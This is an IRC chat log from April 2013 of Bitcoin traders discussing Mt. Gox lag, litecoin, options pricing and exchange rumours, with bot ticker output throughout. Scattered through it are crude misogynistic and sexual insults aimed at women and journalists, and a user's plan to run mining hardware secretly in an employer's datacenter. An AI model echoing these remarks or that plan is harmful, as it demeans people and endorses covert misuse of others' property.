when it looses a bid Apr 02 23:12:49 I can't Apr 02 23:12:59 ;;calc (500-188)/500 Apr 02 23:12:59 0.624 Apr 02 23:13:02 i switched forex to dBTC like a month ago Apr 02 23:13:03 oh please don't throw me into the briar patch Apr 02 23:13:10 dont wanna switch again Apr 02 23:13:15 just silly. Apr 02 23:13:20 ;;goxlag Apr 02 23:13:21 80.659941 seconds Apr 02 23:13:23 ;;ticker Apr 02 23:13:24 BTCUSD ticker | Best bid: 114.64001, Best ask: 114.89000, Bid-ask spread: 0.24999, Last trade: 114.89000, 24 hour volume: 81842.00811465, 24 hour low: 99.00000, 24 hour high: 116.00000, 24 hour vwap: 105.82760 Apr 02 23:13:28 o 80 seconds almost buy time Apr 02 23:13:32 need more ddos Apr 02 23:13:35 lol at gox...do they think that volume is going to decrease? Apr 02 23:13:44 everyone just use uBTC like i proposed Apr 02 23:13:53 errybody just use dollars Apr 02 23:13:58 gox is distracted prepating for litecoin features duh Apr 02 23:14:24 has that been confirmed as not aprils 1st joke Apr 02 23:14:24 1 USD = 884 uBTC.. such approachable numbers Apr 02 23:14:37 yes apparently Apr 02 23:14:43 for reals?? Apr 02 23:14:46 O_o Apr 02 23:14:47 no Apr 02 23:14:48 you are f'ing kidding me Apr 02 23:14:52 i'm not convinced Apr 02 23:14:56 they can't handle bitcoins but want to get litecoins too? Apr 02 23:15:04 tux just made some broad statements in IRC Apr 02 23:15:10 didnt commit imo Apr 02 23:15:11 mjr_ is how bitcoinland rolls Apr 02 23:16:03 https://data.mtgox.com/api/2/LTCUSD/money/ticker Apr 02 23:16:20 its just silly Apr 02 23:16:31 it fuckin up errything <<< also kittens. Apr 02 23:16:41 Fabian your link doesnt say when ltc will be supported Apr 02 23:16:54 yeah, who knows Apr 02 23:17:09 gox is just takin a piss Apr 02 23:17:14 i hope so Apr 02 23:17:19 satoshi needs to come back and make the wikileaks statement again Apr 02 23:17:21 i think they have stopped caring Apr 02 23:17:24 except s/wikileaks/*/ Apr 02 23:17:31 Dear World, Apr 02 23:17:38 Please go fuck yourself. Also fix your own problems. Apr 02 23:17:40 Love, Apr 02 23:17:42 Satoshi. Apr 02 23:17:56 i like the also Apr 02 23:18:09 ThickAsThieves that's what he does. makes broad statements about how their user support takes 20 minutes Apr 02 23:18:12 is laughed out of forum. Apr 02 23:18:16 hahha Apr 02 23:18:28 9600 users in queue Apr 02 23:19:06 [MPEX] [S.BBET] 20 @ 0.0007531 = 0.0151 BTC [-] Apr 02 23:19:20 [MPEX] [S.DICE] 189 @ 0.0036201 = 0.6842 BTC [-] Apr 02 23:19:29 [MPEX] [S.MPOE] 150 @ 0.00067413 = 0.1011 BTC [-] Apr 02 23:19:33 ;;bids 0 Apr 02 23:19:34 There are currently 30929737 bitcoins demanded at or over 0.0 USD, worth 10172997.2865 USD in total. | Data vintage: 0.0179 seconds Apr 02 23:19:46 ;;ticker Apr 02 23:19:47 BTCUSD ticker | Best bid: 113.00001, Best ask: 113.84999, Bid-ask spread: 0.84998, Last trade: 113.84999, 24 hour volume: 82748.77279871, 24 hour low: 99.00000, 24 hour high: 116.00000, 24 hour vwap: 105.92395 Apr 02 23:19:50 mjr_ ya they all joined past 20 minutes Apr 02 23:19:53 [HAVELOCK] [VTX] 2 @ 0.521 = 1.042 BTC [-] Apr 02 23:19:54 [HAVELOCK] [VTX] 1 @ 0.51 BTC [-] Apr 02 23:21:19 https://twitter.com/MtGox/status/319143280157794305 Apr 02 23:22:31 ah i found i Apr 02 23:22:32 http://pastebin.com/q225BqUQ Apr 02 23:22:53 [HAVELOCK] [VTX] 1 @ 0.51 BTC [-] Apr 02 23:22:54 [HAVELOCK] [VTX] 1 @ 0.51 BTC [-] Apr 02 23:23:12 thats the gox chat about ltc Apr 02 23:23:17 supposedly Apr 02 23:23:48 lol the ltc client will thrash their server to death Apr 02 23:24:16 it took here several hours to catch afer i last ran it a month ago Apr 02 23:24:21 100% HDD Apr 02 23:24:47 they cannot handle the power of ltc trolls Apr 02 23:25:10 lol yes, adding trollbox will be necessary Apr 02 23:25:29 ltc is not ltc without the trollbox Apr 02 23:25:48 thats the fatal flaw of crypto-trade.com, if it isnt a scam Apr 02 23:26:11 the trollbox makes me money Apr 02 23:26:37 well it seems bitbet will have strong april dividends too Apr 02 23:26:51 aweseom news Apr 02 23:26:53 some doofus just sent 20 btc trying to leech the ltc bet and made it 4 blocks too late. Apr 02 23:27:18 hah Apr 02 23:27:24 move it or lose it they say Apr 02 23:27:48 i am starting to think the education through taxation of the consumer mentality is bitbet's main contribution to btc. Apr 02 23:28:04 lol Apr 02 23:28:45 i like that "education through taxation" Apr 02 23:28:53 [HAVELOCK] [VTX] 10 @ 0.501 = 5.01 BTC [-] Apr 02 23:28:54 [HAVELOCK] [VTX] 9 @ 0.5 = 4.5 BTC [-] Apr 02 23:29:28 i have .0102 in BitBet referall pmts Apr 02 23:29:46 referral* Apr 02 23:29:49 mircea_popescu: bitbets main contribution is putting money behimd forecasts Apr 02 23:29:51 ten bux, buy the gal a new set of stockings Apr 02 23:30:01 thestringpuller i thought so too originally Apr 02 23:30:20 but seems at least for now the main thing it does is bitchslap the "i am smarter than the world and also always right" crowd. Apr 02 23:30:38 heh Apr 02 23:30:38 stupidity taxes are fun ;) Apr 02 23:30:49 ;;ticker Apr 02 23:30:50 BTCUSD ticker | Best bid: 112.88001, Best ask: 113.88699, Bid-ask spread: 1.00698, Last trade: 112.88001, 24 hour volume: 83206.91550006, 24 hour low: 99.00000, 24 hour high: 116.00000, 24 hour vwap: 106.00173 Apr 02 23:31:23 it's a little better than that. Apr 02 23:31:25 we hit 100 yesterday right? Apr 02 23:31:36 bet says whatever 10:100. this dood sees ltc crossing so he knows how the bet resolves Apr 02 23:31:40 and then he sends whatever btc. Apr 02 23:31:44 because this is how people behave. Apr 02 23:33:08 would be kinda cool to have a Top 10 betters list Apr 02 23:33:17 who won the most, who is right the most Apr 02 23:33:28 [BTCTC] [PAJKA.BOND] 1 @ 0.1 BTC [-] Apr 02 23:33:44 something like that Apr 02 23:33:53 mebbe Apr 02 23:33:59 then people can shadow their bets Apr 02 23:35:39 maybe. tho you know... security implication Apr 02 23:35:45 maybe dood doesn't want his addy up there. Apr 02 23:35:55 thought about that too Apr 02 23:36:05 but it already is Apr 02 23:36:08 i sold 188 calls ? what the fucking fuck. Apr 02 23:36:14 or, you could mask digits Apr 02 23:36:26 twas me MP Apr 02 23:36:26 ThickAsThieves well yeah this is kinda true Apr 02 23:38:27 What's up with the Taub guy spreading FUD about btc24? Hired by the competition? Apr 02 23:38:59 or truthiness? Apr 02 23:39:11 Schadenfreude what's that ? Apr 02 23:40:03 [15:24] dont trade on bitcoin24 Apr 02 23:40:03 [15:24] if you got cash Apr 02 23:40:03 [15:24] get it the fuck out Apr 02 23:40:03 [15:25] all im gonna say Apr 02 23:40:23 theres ar erason the hotwallet is always empty Apr 02 23:40:37 yep, it's that Apr 02 23:41:04 ugh Apr 02 23:41:25 http://www.youtube.com/watch?v=UYPaN_41tv0 proof Apr 02 23:42:06 jeez what the hell these things popping like 16 yo cherries in rural texas. Apr 02 23:43:58 epic. Apr 02 23:44:00 ;;asks 120 Apr 02 23:44:02 There are currently 7896.2408 bitcoins offered at or under 120.0 USD, worth 928367.695667 USD in total. | Data vintage: 0.0010 seconds Apr 02 23:45:21 ;;bids 80 Apr 02 23:45:21 There are currently 50005.472 bitcoins demanded at or over 80.0 USD, worth 4712927.36598 USD in total. | Data vintage: 78.9417 seconds Apr 02 23:47:55 wow Apr 02 23:48:08 you know that IS kind of sparse Apr 02 23:48:10 WTS G.SDICE,G.MPOE,G.BBET, BTCQuick! contact me with offer :) Apr 02 23:50:33 "Another reason banks need more equity: They tend to have less than they claim" Apr 02 23:50:34 duh. Apr 02 23:52:11 Odd, anyone else can verify the btc24 issue? Apr 02 23:53:02 Schadenfreude it's not the first time i heard this in the past week, but i've never bothered checking. Apr 02 23:53:31 bfl is advertising "initial shipping scheduled for the last half of March 2013." lmao Apr 02 23:53:57 you know those block cuffers must be overrun if there's nobody to even fix advertising times anymore Apr 02 23:54:50 well if the glitch is true and i think it is, the exchange is over, someone else wouldve found out and exploited it to hell and back Apr 02 23:55:01 as well as the occasional customer that just happesn to suddenly have twice the money Apr 02 23:55:29 ;;ticker Apr 02 23:55:30 BTCUSD ticker | Best bid: 112.21000, Best ask: 113.72000, Bid-ask spread: 1.51000, Last trade: 112.21000, 24 hour volume: 84972.01026069, 24 hour low: 99.00000, 24 hour high: 116.00000, 24 hour vwap: 106.18610 Apr 02 23:55:35 http://deutsche-wirtschafts-nachrichten.de/2013/04/02/usa-und-eu-wollen-bitcoin-an-die-leine-nehmen/ Apr 02 23:55:59 "USA and EU want to take Bitcoin on a leash" Apr 02 23:55:59 central banks and bitcoin lol yea Apr 02 23:56:22 Schadenfreude i would call this uninformed crap. Apr 02 23:56:29 indeed! Apr 02 23:56:42 fact of the matter is vast majority of journalism today is done by people who couldn't find a job elsewhere Apr 02 23:56:53 such as, girls too fat to be waitresses and too stupid to work for the govt. Apr 02 23:57:00 Basically the european central bank calls btc a ponzi scheme, both USA and EU want to regulate BTC as they feel threatened by it Apr 02 23:57:05 they do it mostly for free, much like starlets suck producer cock for free. Apr 02 23:57:24 given all this, it shouldn't surprise they're not capable of reading a text (in this case the finra guidance) and summarize it correctly. Apr 02 23:57:27 their only tool to handle bitcoins is criminalization Apr 02 23:57:32 thats all they can do Apr 02 23:57:58 mircea_popescu: Do you hold any assets in btc24 if I may ask? Apr 02 23:58:04 http://trilema.com/2013/stage-n-bitcoin-exists/ Apr 02 23:58:17 moldbug still hasn't got his ballsack together to answer incidentally. Apr 02 23:58:40 paid content srsly Apr 03 00:00:47 worth every dime Apr 03 00:00:57 you have been reading too much again Apr 03 00:01:01 has anyone ran the numbers on a gpu compute instance in amazon? Apr 03 00:01:29 pretty sure its not worth it, but curious Apr 03 00:01:32 lotsa people, lotsa times - those are cudas, they're not very efficient for mining BTC Apr 03 00:01:38 ah ok Apr 03 00:01:41 ya cudas Apr 03 00:01:55 cuda is the language i believe Apr 03 00:01:58 (though, I haven't run the numbers @ current diff & exchange rate) Apr 03 00:02:12 are they the tesla's? Apr 03 00:02:19 (either way it's all nvidia IIRC) Apr 03 00:02:22 they're the small dinky shits basically. Apr 03 00:02:30 cuz tesla's are dope (except for mining) Apr 03 00:02:33 haha Apr 03 00:02:47 for science though, they are awesome Apr 03 00:02:49 https://bitcointalk.org/index.php?topic=164143.msg1722510#msg1722510 lmao Apr 03 00:03:38 1 teraflop at your workstation...that is kinda sick you have to admit (unless you want to mine) Apr 03 00:03:47 proper sentence construction is pretty lost on most people too Apr 03 00:04:17 I just can't imagine mining with my workstation - I want a computer not a heater. Apr 03 00:04:56 anyone know where friedcat is? Apr 03 00:05:12 china? Apr 03 00:05:15 as in, where in china Apr 03 00:05:44 thinking of offering to build a network for him Apr 03 00:05:48 tesla's aren't that hot...and even the avalon was not running crazy hot last time i sat next to it Apr 03 00:05:57 but it is pretty cold in nyc anyway Apr 03 00:06:04 guruvan some people live in like alaska Apr 03 00:06:07 and frigid marriages Apr 03 00:06:16 dub i thought beijing Apr 03 00:06:37 is mpoe-pr in romania? Apr 03 00:06:48 oh - well...here in Northern California I have heated my home with monitors....but it's almost summer...even in Alaska Apr 03 00:06:55 have frigid marriage? mine btc! Apr 03 00:07:24 tell the woman: put the box on the box, and we'll get something going Apr 03 00:07:24 mjr_ of and on Apr 03 00:07:25 gotta run to the bar ;) see ya'll in a little bit Apr 03 00:07:30 if i change jobs i plan to leave my miners in the datacenter where they are until someone notices them Apr 03 00:07:48 guruvan in the immortal words of don rickles, "woman, get started, i'll go get the paper" Apr 03 00:07:56 LOL Apr 03 00:08:11 i think that guy is my favourite comedian all time Apr 03 00:08:18 tho a hard match with carlin Apr 03 00:08:22 definitely in my top few Apr 03 00:08:40 he's like "dean, don't worry, we'll tell you what happened tomorrow" Apr 03 00:08:55 jcpham: I've seen a few servers under floor tiles, even one behind drywall Apr 03 00:09:04 nice Apr 03 00:09:06 dub embedded processing Apr 03 00:09:09 i like mine in racks Apr 03 00:09:14 racks are nice Apr 03 00:09:19 with the A/C blowing directly on them Apr 03 00:09:25 under the floor is more secure Apr 03 00:09:26 while they hash away for months Apr 03 00:09:48 i might be able to keep them running 6 more months before anyone notices Apr 03 00:09:59 http://24.media.tumblr.com/tumblr_llkdffSxb11qd8atyo1_500.jpg Apr 03 00:10:04 illustrative pic related. Apr 03 00:10:13 dude - me & my brother had a server in a DC that we sold to a customer.....for almost 10yrs Apr 03 00:10:14 epic boobs Apr 03 00:10:17 ;;ticker Apr 03 00:10:18 BTCUSD ticker | Best bid: 114.62001, Best ask: 115.00000, Bid-ask spread: 0.37999, Last trade: 114.62001, 24 hour volume: 85321.94868801, 24 hour low: 99.00000, 24 hour high: 116.00000, 24 hour vwap: 106.38840 Apr 03 00:10:32 jcpham that's what i call a rack Apr 03 00:10:38 epic. Apr 03 00:10:39 and yes it gets better if ac is blowing directly on it Apr 03 00:10:56 definitely has back pain Apr 03 00:11:05 pain is good for womenz Apr 03 00:11:08 builds character. Apr 03 00:11:24 that's why high heels Apr 03 00:11:43 too cartoonish Apr 03 00:12:03 totally. Apr 03 00:12:59 http://naukas.com/2013/04/02/la-fiebre-de-los-bitcoins/ Apr 03 00:13:05 en espanol if you speak it Apr 03 00:13:20 Arthur sends some bitcoins Apr 03 00:13:35 link to esperanto ver plox Apr 03 00:13:59 lojban Apr 03 00:14:02 i actually do speak it, but i didn't get past the pagesized bicoin pic with a watermark on it Apr 03 00:14:56 "I guess that's what they call a liquidity rebate" lol Apr 03 00:18:30 [BTCTC] [LTC-MINING] 1 @ 0.36 BTC [+] Apr 03 00:21:59 "I just verified my Coinbase account and am hoping to buy bitcoins in less than 3-4 weeks (which has been the case with Bitinstant lately)" Apr 03 00:22:00 fucking joke. Apr 03 00:22:11 these people going about pretending like they're doing business, are entrepreneurs, Apr 03 00:22:18 trying to scam va's out of financing... Apr 03 00:22:21 it boggles the mind. Apr 03 00:23:03 that's what happens when there are more angels than talent Apr 03 00:23:32 which is the problem of too much money. of course. Apr 03 00:23:39 shades of 1998 Apr 03 00:24:23 i need a larger fly swatter. Apr 03 00:24:43 https://bitcointalk.org/index.php?topic=164867.msg1722538#msg1722538 lol Apr 03 00:27:25 bitcoin-central.net update Apr 03 00:28:32 a ty Apr 03 00:30:29 [BTCTC] [BTC-TRADING-PT] 1 @ 0.24 BTC [+] Apr 03 00:33:20 how long til 120 you think? Apr 03 00:33:28 i give it 8 hours tops Apr 03 00:33:30 couple hourse Apr 03 00:33:30 one night sleep Apr 03 00:33:47 heh Apr 03 00:33:49 ;;bc,stats Apr 03 00:33:51 Current Blocks: 229365 | Current Difficulty: 6695826.282596251 | Next Difficulty At Block: 229823 | Next Difficulty In: 458 blocks | Next Difficulty In About: 2 days, 14 hours, 48 minutes, and 41 seconds | Next Difficulty Estimate: 7713534.00467 | Estimated Percent Change: 15.19914 Apr 03 00:33:58 fuck - at this rate I wouldn't be surprised to wake up to $200 BTC and $20 LTC Apr 03 00:34:23 get out Apr 03 00:34:32 btc pls stop trolling my options Apr 03 00:34:37 mp, what amount of loss on options would you have to take before you changed how it works? Apr 03 00:34:50 lol, srsly tho Apr 03 00:35:16 a lot. Apr 03 00:35:25 http://www.runtogold.com/2013/04/why-michael-pento-should-just-keep-his-mouth-shut/ Apr 03 00:36:24 wtf is an internet? Apr 03 00:36:42 what's a pento Apr 03 00:36:55 sounds portuguese Apr 03 00:37:43 lol Apr 03 00:37:46 guess what it is Apr 03 00:37:53 it's Italian for "regret" Apr 03 00:37:58 that article sucks. Apr 03 00:38:08 http://translate.google.com/#it/en/pento Apr 03 00:38:24 how sweet is that Apr 03 00:38:30 that cnbc interview was fantastic IMO Apr 03 00:38:35 good television Apr 03 00:38:42 Lyspooner stop trolling! Apr 03 00:38:47 lol Apr 03 00:39:02 they did another interview one day later Apr 03 00:39:03 [BTCTC] [ASICMINER-PT] 1 @ 0.7791 BTC [-] Apr 03 00:39:11 so tell me the people weren't intrigued Apr 03 00:39:12 mp i have deposits waiting to buy more optionssssss Apr 03 00:39:37 pento is the guy that asked his it dept about bitcoin Apr 03 00:39:39 120 is tomorrow Apr 03 00:39:44 he desperately needs a meme Apr 03 00:39:45 the expensify guy looked like someone just sat on his dinner the whole time Apr 03 00:40:09 pento's it department said "stay outa bitcoin" so he is Apr 03 00:40:14 75% of people who saw that interview wanted to see the expensify guy take on the bankers Apr 03 00:40:14 im surprised they didn;'t invite taaki Apr 03 00:40:15 he's smart Apr 03 00:40:32 jcpham totally. i also use my it dept for strategic management. Apr 03 00:40:32 IT dept was probly like "dude, fuck Mike, tell him lies" Apr 03 00:40:37 users who listen to their it department make me happy Apr 03 00:40:41 this is why i'm so happy with bitcoin dev role confusion. Apr 03 00:41:09 i mean with people saying stuff like that on tv.... Apr 03 00:41:14 how can i beieve them Apr 03 00:41:38 because your water is sufficiently fluoridated ? i dunno. Apr 03 00:41:48 "i really like where gold is headed, but my aunt said i shouldn't because she likes the color of silver" Apr 03 00:41:49 $avg Apr 03 00:41:51 ThickAsThieves: 106.31 Apr 03 00:42:04 $auntball Apr 03 00:42:05 mircea_popescu... any plans to base your options on a bitcoin index composed of anything other than mtgox Apr 03 00:42:18 i'd like to see data pulled from 3 exchanges at least Apr 03 00:42:19 Lyspooner they've for the ~year and a half been based on the all-exchanges index Apr 03 00:42:33 bitfloor of course because you can sell coins for anything at bitfloor Apr 03 00:42:35 oh nice Apr 03 00:42:40 mtgox for vloume Apr 03 00:42:42 is there an index Apr 03 00:42:48 maybe btc-e for scamcoins Apr 03 00:43:03 http://bitcoincharts.com/markets/currencies/ Apr 03 00:43:23 106.31 92.79 62.64 Apr 03 00:43:24 holy sheit. Apr 03 00:43:33 watch as AUD rockets past USD Apr 03 00:43:42 yuan: the new global reserve Apr 03 00:43:57 herpderp ThickAsThieves what deposits you on about ? Apr 03 00:44:11 "Helixion's announces expansive new mobile payment platform" Apr 03 00:44:16 yeah, there's space for another one. Apr 03 00:44:18 sorry, how does bitcoincharts weight their index Apr 03 00:44:42 Lyspooner all-exchanges vwap. Apr 03 00:44:54 http://bitcoincharts.com/markets/ Apr 03 00:44:57 that's the exchanges list Apr 03 00:45:04 ;;ticker Apr 03 00:45:05 BTCUSD ticker | Best bid: 114.18999, Best ask: 115.00000, Bid-ask spread: 0.81001, Last trade: 114.18999, 24 hour volume: 85389.54904890, 24 hour low: 99.00000, 24 hour high: 116.00000, 24 hour vwap: 106.52455 Apr 03 00:45:06 The bullshit in the startup space is certainly not limited to bitcoin, I'm not even sure that bitcoin startups are particularly incompetent next to their peers Apr 03 00:45:18 Bugpowder_ it stands out a lot tho. Apr 03 00:45:19 that leaves your options prone to volume-inducing wash trading at the smaller exchanges Apr 03 00:45:28 because in general they bnullshit about less clearly defined things Apr 03 00:45:34 bitcoin is very complex and very well known to a core Apr 03 00:45:41 yah the media attention is totally disproportionate Apr 03 00:45:41 making their bullshit painfully obvious and easy to pinpoint Apr 03 00:45:44 mp, i mean to my coinbr, maybe just waiting for jurov Apr 03 00:46:10 Lyspooner i've failed to measure such an effect so far. Apr 03 00:46:15 ThickAsThieves well then ping him lol Apr 03 00:46:31 you are still prone Apr 03 00:46:37 probly stil confirmsing nvm Apr 03 00:46:45 i'm gonna be prone to something. Apr 03 00:46:45 sry Apr 03 00:46:48 da fuck am i gonna do. Apr 03 00:46:53 change the index Apr 03 00:47:04 to what ? Apr 03 00:47:08 mtgox only ? Apr 03 00:47:14 they probably wash as much as anyone else. Apr 03 00:47:27 their wash trading must be done close to market Apr 03 00:47:34 something like RockUSD doesn't Apr 03 00:47:36 this is debatable. Apr 03 00:47:46 its volume weighted Apr 03 00:47:46 moreover, a small exchange washing would stick out like a motherfuckingsore tumb Apr 03 00:48:21 but what recourse do your options contract have if someone trades 500,000,000 BTC at Rock Exchange at a price of 4500 USD/BTC Apr 03 00:48:37 0.0 Apr 03 00:48:38 [MPEX] [S.MPOE] 6200 @ 0.00067538 = 4.1874 BTC [+] Apr 03 00:48:39 [MPEX] [S.MPOE] 7655 @ 0.00067539 = 5.1701 BTC [+] Apr 03 00:48:53 i'm probably striking any deals and banning involved accounts. Apr 03 00:48:57 granted, the trades are bogus, but your contracts pretty much are based off of that bitcoincharts figure Apr 03 00:49:27 heh I has $3000 worth of ppcoin Apr 03 00:49:39 dub buy yourself drugz nao! Apr 03 00:50:22 must suck to have all that money Apr 03 00:50:23 base your price of btc/coke gram on SR Apr 03 00:50:33 i mean..i don't know what i'd do.. Apr 03 00:50:48 can mine like $20/day with one GPU for litecoin at the moment Apr 03 00:51:14 what hashrate? Apr 03 00:51:20 650 or so Apr 03 00:51:46 i'm actually putting about 9000 online this week Apr 03 00:52:53 [HAVELOCK] [SDICE] 7 @ 0.35100002 = 2.457 BTC [+] Apr 03 00:52:53 GoMaD GordonG3kko gribble Grishnakh_ grubles Guest3893 guruvan gwillen Apr 03 00:52:55 [HAVELOCK] [SDICE] 6 @ 0.35100001 = 2.106 BTC [-] Apr 03 00:52:58 KRS1 good problem to have. Apr 03 00:53:06 =D Apr 03 00:56:45 I'd love to know what opportunity would bring such glee to a formal event http://s3-ec.buzzfed.com/static/enhanced/web05/2012/7/16/0/enhanced-buzz-10105-1342413332-10.jpg Apr 03 00:57:02 buttseks and only buttseksz Apr 03 00:57:23 with leg warmers, no doubt. Apr 03 00:58:07 cant have legwarmers without buttsex Apr 03 00:58:16 the weirdo looks quite fuckable, form a female perspective Apr 03 00:58:42 Latest News: RBC Closing, Cash Processing and EMT Changes Apr 03 00:58:49 cavirtex Apr 03 00:59:27 ? Apr 03 00:59:41 so they losrt a processor ? Apr 03 00:59:50 or they lost their only processor ? Apr 03 00:59:54 Cavirtex RBC account is being closed, not by their choice Apr 03 01:00:10 i get that. do they have others ? Apr 03 01:00:17 !ticker h vix Apr 03 01:00:18 Some are born to endless night. Apr 03 01:00:18 Yes they do Apr 03 01:00:30 what was it called ? Apr 03 01:00:30 1. Our Royal Bank account will be closing on April 5, 2013. Cash payments will no longer be accepted at any RBC branch after April 5, 2013. You may still make cash payments to BMO and Scotiabank. 2. As a result of the closure of RBC, email money transfer fees will be raised from $10 to $20 starting April 5, 2013. We advise all customers to use the direct deposit method to withdraw CAD Apr 03 01:00:31 from their VirtEx account. Unverified users can use direct deposit to withdraw up to $5000 per day and $10,000 per month. 3. We are no longer processing RUSH cash payments, instead, we are increasing the number of times we process cash each day. Cash payments will be processed at 9AM, 2PM, 4PM and 8PM (MST). Apr 03 01:00:49 !ticker havelock vix Apr 03 01:00:51 I don't know those people, and they don't look very friendly. Apr 03 01:00:59 vtx Apr 03 01:01:00 am i halucinating ? Apr 03 01:01:02 a ty Apr 03 01:01:05 !ticker h vtx Apr 03 01:01:06 [HAVELOCK:VTX] 1D: 0.50000000 / 0.5523632 / 0.57499999 (154 shares, 85.06393228 BTC), 7D: 0.41200000 / 0.53694063 / 0.70000000 (1453 shares, 780.17474209 BTC), 30D: 0.38280000 / 0.43456538 / 0.79900000 (12672 shares, 5506.81254553 BTC) Apr 03 01:01:28 Tangiblecryptography went hrough this with BOA Apr 03 01:01:32 through Apr 03 01:01:57 yea Apr 03 01:02:17 anticompetitive practice Apr 03 01:02:41 welcome to the govt sponsored banking enterprise Apr 03 01:02:52 [HAVELOCK] [SDICE] 1 @ 0.39879999 BTC [+] Apr 03 01:03:23 Gerald from TC seems like a good guy, wish he would list with you MP Apr 03 01:03:35 i kinda like him too. Apr 03 01:03:41 TC is fantastic Apr 03 01:03:50 easiest in and out of bitcoin Apr 03 01:03:52 [HAVELOCK] [SDICE] 2 @ 0.3988 = 0.7976 BTC [+] Apr 03 01:03:58 i think he's loath to take the btc pill tho Apr 03 01:04:02 or maybe has fiat investors Apr 03 01:04:14 feel sorry for all the competent noobs that can't get a bitcoins direct account Apr 03 01:04:40 I know he has fiat investors, but he and Death and Taxes are very good Apr 03 01:04:40 No reason he can't just bootstrap his company with his revenue Apr 03 01:04:54 why take investors if you don't have to? Apr 03 01:05:09 jborkl afaik gerald = d&t neh ? Apr 03 01:05:18 its a pretty low overhead operation I imagine Apr 03 01:05:28 oh, you know I am not sure Apr 03 01:05:36 I know him by Gerald Apr 03 01:05:53 [HAVELOCK] [SDICE] 2 @ 0.398888 = 0.7978 BTC [+] Apr 03 01:05:54 [HAVELOCK] [SDICE] 7 @ 0.398888 = 2.7922 BTC [+] Apr 03 01:05:54 I always thought of them as two people, they act different Apr 03 01:06:20 Bugpowder_ too late by now i think Apr 03 01:06:55 reminds me I need to send him a email, don't delete my key Apr 03 01:07:30 ya i like he's like the ONLY ONE with enough sense to copy the mpex model Apr 03 01:07:39 how hard can it be seriously Apr 03 01:10:13 jborkl send him an email "don't delete my key and list with mpex" lol Apr 03 01:10:48 I just did Apr 03 01:12:10 coinbr deposits credited (at least for ppl who did pay the txfee) Apr 03 01:14:31 I told him if he listed he could drink umbrella drinks in Costa Rica Apr 03 01:15:21 haha how's that work ? Apr 03 01:17:00 II think that would be a huge IPO, they are not a bunch of idiots like all the other exchanges Apr 03 01:17:24 he also actually answers support email within a very reasonable time Apr 03 01:17:37 methinks you're right. Apr 03 01:18:30 I would invest. Apr 03 01:18:31 You remember when the dumbass sent money direct from TG to his criminal attorney Apr 03 01:19:44 caused a bunch of problems for TG, that is when they locked keys to only past customers Apr 03 01:20:00 no ? Apr 03 01:20:04 i missed out on this one Apr 03 01:20:52 Some dipshit sold Bitcoins to TG and wire instructions were to dumbass criminal attorney Apr 03 01:21:49 attorney got wire tranfer from TG , with acct number and routing number - attorney was not a happy camper - Apr 03 01:22:18 Then TG locked keys to only past customers Apr 03 01:22:51 wtf? Apr 03 01:22:53 who is tg? Apr 03 01:23:44 TC, sorry Apr 03 01:24:39 o yea yea i recall Apr 03 01:24:57 like a year ago tho Apr 03 01:25:06 was "how do you have my bank number SCAMMOR" Apr 03 01:28:20 jurov, how come the orderbook zeroes out all the time in coinbr Apr 03 01:28:34 can only handle like 1 change then it glitches Apr 03 01:29:18 some javascript weirdness. can you open js console if there's anything? Apr 03 01:31:00 all i see is Apr 03 01:31:00 GET https://coinbr.com/css/tooltips.css 404 (Not Found) Apr 03 01:31:19 it shows zeroes only when i load a book i already loaded before Apr 03 01:32:50 i refresh it once or twice and it generally comes back Apr 03 01:33:09 yeah if i reload it works again Apr 03 01:33:11 til it doesnt Apr 03 01:33:28 hmmm... now i see... if you change Item many times Apr 03 01:34:18 i can be a lil spastic after all Apr 03 01:34:19 ahhhh seems it is dividing the prices by SATOSHI multiple times, thereby all end up zero Apr 03 01:35:27 $avg Apr 03 01:35:29 ThickAsThieves: 106.64 Apr 03 01:35:35 ;;ticker Apr 03 01:35:36 BTCUSD ticker | Best bid: 114.50200, Best ask: 115.00001, Bid-ask spread: 0.49801, Last trade: 115.00001, 24 hour volume: 83365.50875871, 24 hour low: 99.00000, 24 hour high: 116.00000, 24 hour vwap: 106.82873 Apr 03 01:36:04 wow..its like..i have to rub my eyes reading this daily Apr 03 01:36:16 just to make sure i dont misplace the decimal or something. Apr 03 01:37:06 check out that sexy curve http://bitcoincharts.com/charts/mtgoxUSD#rg180ztgSzm1g10zm2g25zi1gADXzv Apr 03 01:37:10 my friend had been mining litecoin for the past 8 mo or so and had no idea what the price was..I told him and later he called me back to tell me he had $7000 in his acct. Apr 03 01:37:28 surprised it wasnt more Apr 03 01:37:31 someone draw goat on it Apr 03 01:37:48 ya we're just small fish Apr 03 01:37:53 [HAVELOCK] [SDICE] 5 @ 0.4000001 = 2 BTC [+] Apr 03 01:40:52 [HAVELOCK] [SDICE] 4 @ 0.4000001 = 1.6 BTC [+] Apr 03 01:41:06 [BTCTC] [ASICMINER-PT] 1 @ 0.7791 BTC [-] Apr 03 01:41:55 for the past two months, the longest string of green candle days is 8, red candles is 2 Apr 03 01:43:53 [HAVELOCK] [SDICE] 14 @ 0.4 = 5.6 BTC [-] Apr 03 01:44:02 [MPEX] [O.USD.C125T] 300 @ 0.16637225 = 49.9117 BTC Apr 03 01:45:13 [MPEX] [S.MPOE] 5000 @ 0.00067987 = 3.3994 BTC [+] Apr 03 01:46:47 [MPEX] [O.USD.C104T] 50 @ 0.24944674 = 12.4723 BTC [+] Apr 03 01:47:24 [MPEX] [O.USD.C110T] 40 @ 0.22197582 = 8.879 BTC Apr 03 01:52:27 all these calls early on Apr 03 01:53:24 means? Apr 03 01:54:13 mircea_popescu is gonna manipulate the market again Apr 03 01:54:24 when can we expect a turn or plateu here? Apr 03 01:54:28 any guesses Apr 03 01:54:33 130ih Apr 03 01:54:44 130ish Apr 03 01:54:54 $vwap Apr 03 01:54:57 thestringpuller: http://pastebin.com/raw.php?i=WsXus04h Apr 03 01:55:03 $avg Apr 03 01:55:05 ThickAsThieves: 106.70 Apr 03 01:55:22 !ticker m ^OIX Apr 03 01:55:23 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 86.04499804 / 102.57873909 / 136.28053963 (10015 shares, 4,619.36 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 03 01:56:12 those calls need more like 145 Apr 03 01:56:28 140 Apr 03 01:56:30 ish Apr 03 01:56:47 [MPEX] [S.DICE] 2735 @ 0.00400173 = 10.9447 BTC [+] Apr 03 01:56:50 [BTCTC] [S.DICE-PT] 4 @ 0.0048 = 0.0192 BTC [+] Apr 03 01:57:04 i dunno, i think 145 isnt too far... Apr 03 02:01:55 ;;goxlag --au Apr 03 02:01:56 MtGox lag is 20.507841 seconds. During this time, light travels 0.0410974837468 AU, which is closest to the distance between the Sun and edge of solar corona, 0.01 AU Apr 03 02:03:21 wow 